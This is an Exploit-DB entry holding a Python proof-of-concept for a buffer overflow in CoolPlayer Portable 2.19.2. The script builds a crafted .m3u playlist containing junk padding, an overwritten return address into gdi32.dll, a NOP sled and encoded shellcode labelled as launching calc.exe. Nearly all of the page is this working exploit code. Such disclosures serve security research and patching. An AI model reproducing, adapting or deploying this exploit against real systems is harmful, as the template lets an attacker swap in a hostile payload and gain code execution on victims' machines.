CoolPlayer Portable 2.19.2 - Buffer Overflow



EDB-ID: 17294 CVE: N/A OSVDB-ID: N/A
Author: sinfulsecurity Published: 2011-05-16 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Screenshot
Prev Home Next
#CoolPlayer+ Portable Buffer Overflow
#Version:  2.19.2
#Author: Securityxxxpert
#Date Submitted:  May 16, 2011
#Download Link: http://download.cnet.com/CoolPlayer-Portable/3000-2139_4-75448619.html
#Tested on:  Windows Xp Sp3
print "--------------------------------------------------------------------------------"
print "                                      Cool Player Exploit                       "
print "                                      Retreat Hell!                             "
print "Greetz:  Acidgen, Subinacls, GrumpyBear, Pyoor, Corelanc0d3r, Dr. Nick, Rek0n   "
print "Greetz Cont:  Podjackel, g0tmi1k & The entire Corelan & Offensive Security Team            "
print "--------------------------------------------------------------------------------"
filename = "exploit.m3u"
junk = "\x41"*210
EIP = "\x8A\x1D\xF3\x77" #0x77F31D8A gdi32.dll
nopsled = "\x90"*22
#calc.exe
sc = ("\xb8\x20\x65\x02\x44\xdb\xc2\xd9\x74\x24\xf4\x5a\x33\xc9" 
"\xb1\x32\x31\x42\x12\x03\x42\x12\x83\xca\x99\xe0\xb1\xf6" 
"\x8a\x6c\x39\x06\x4b\x0f\xb3\xe3\x7a\x1d\xa7\x60\x2e\x91" 
"\xa3\x24\xc3\x5a\xe1\xdc\x50\x2e\x2e\xd3\xd1\x85\x08\xda" 
"\xe2\x2b\x95\xb0\x21\x2d\x69\xca\x75\x8d\x50\x05\x88\xcc" 
"\x95\x7b\x63\x9c\x4e\xf0\xd6\x31\xfa\x44\xeb\x30\x2c\xc3" 
"\x53\x4b\x49\x13\x27\xe1\x50\x43\x98\x7e\x1a\x7b\x92\xd9" 
"\xbb\x7a\x77\x3a\x87\x35\xfc\x89\x73\xc4\xd4\xc3\x7c\xf7" 
"\x18\x8f\x42\x38\x95\xd1\x83\xfe\x46\xa4\xff\xfd\xfb\xbf" 
"\x3b\x7c\x20\x35\xde\x26\xa3\xed\x3a\xd7\x60\x6b\xc8\xdb" 
"\xcd\xff\x96\xff\xd0\x2c\xad\xfb\x59\xd3\x62\x8a\x1a\xf0" 
"\xa6\xd7\xf9\x99\xff\xbd\xac\xa6\xe0\x19\x10\x03\x6a\x8b" 
"\x45\x35\x31\xc1\x98\xb7\x4f\xac\x9b\xc7\x4f\x9e\xf3\xf6" 
"\xc4\x71\x83\x06\x0f\x36\x7b\x4d\x12\x1e\x14\x08\xc6\x23" 
"\x79\xab\x3c\x67\x84\x28\xb5\x17\x73\x30\xbc\x12\x3f\xf6" 
"\x2c\x6e\x50\x93\x52\xdd\x51\xb6\x30\x80\xc1\x5a\xb7")


exploit = junk + EIP + nopsled + sc
textfile = open(filename,"w")
textfile.write(exploit)
textfile.close()